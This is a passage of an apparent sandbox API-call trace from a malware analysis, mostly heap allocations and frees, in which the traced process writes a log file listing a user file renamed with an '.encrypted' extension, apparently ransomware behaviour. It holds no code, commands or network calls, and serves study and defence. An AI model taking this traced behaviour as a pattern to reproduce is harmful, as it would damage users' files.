lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c5448 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0029.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.444] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.444] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.445] ReadFile (in: hFile=0x128, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.445] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x89ffb8 | out: hHeap=0x770000) returned 1 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.encrypted.contact\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3630 [0029.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.encrypted.contact\r\n", cchWideChar=73, lpMultiByteStr=0x7f3630, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.encrypted.contact\r\n", lpUsedDefaultChar=0x0) returned 73 [0029.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.445] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.445] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.445] WriteFile (in: hFile=0x128, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0029.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0029.446] CloseHandle (hObject=0x128) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.448] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0029.448] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.449] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0029.449] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.449] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.449] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4f8 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889958 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0029.449] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0029.450] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0029.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0029.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.452] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0029.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.453] RtlAllocateHeap 